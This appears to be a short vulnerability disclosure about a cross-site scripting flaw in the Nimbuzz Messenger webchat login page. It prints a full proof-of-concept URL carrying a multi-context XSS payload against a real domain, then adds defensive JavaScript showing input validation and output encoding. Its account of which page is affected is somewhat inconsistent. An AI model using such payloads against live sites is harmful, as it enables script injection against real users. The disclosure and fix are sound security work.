Grey hat hacker "Sony" has discovered a cross-site scripting (XSS) vulnerability in Nimbuzz Messenger. According to his report, Nimbuzz version 2.2.0 is vulnerable to XSS.
The hacker found the vulnerability in Chat Window --> View in Browser (persistent code). The 'forget password' page was found to be vulnerable to XSS.
Vulnerable Link:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
PoC:
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
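The PoC is a multi-context test string: it tries to close single- and double-quoted JavaScript strings, an HTML comment, a script block and attribute values in one request. The report does not say where `lang` is reflected, so the sketch below is an added example (not Nimbuzz code) that assumes the value ends up inside a script string; it shows the two server-side controls that stop it, allowlist validation of `lang` and output encoding. The language list and function names are assumptions.

```javascript
// Added example, not Nimbuzz code. SUPPORTED_LANGS and all function names are
// assumptions; the request URL below is shortened from the PoC on this page.
const SUPPORTED_LANGS = new Set(["en", "es", "fr", "de"]);

const POC_URL =
  "http://www.nimbuzz.com/webchat_login?lang=" +
  "%27;alert%28String.fromCharCode%2888,83,83%29%29//" +
  "--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3E" +
  "alert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E";

// Percent-decoded value of the `lang` query parameter, as the server sees it.
function rawLang(requestUrl) {
  return new URL(requestUrl).searchParams.get("lang") || "";
}

// Input validation: only a known language code is accepted; anything else
// falls back to the default instead of being echoed into the response.
function safeLang(requestUrl) {
  const lang = rawLang(requestUrl);
  return SUPPORTED_LANGS.has(lang) ? lang : "en";
}

// Output encoding for a value placed inside a quoted string in a <script>
// block: every non-alphanumeric UTF-16 code unit becomes \uXXXX, so quotes,
// backslashes, '<', '>' and '/' cannot end the string or the script element.
function escapeForJsString(value) {
  let out = "";
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : "\\u" + value.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

console.log("decoded lang :", rawLang(POC_URL));
console.log("validated    :", safeLang(POC_URL));
console.log("JS-encoded   :", escapeForJsString(rawLang(POC_URL)));
```
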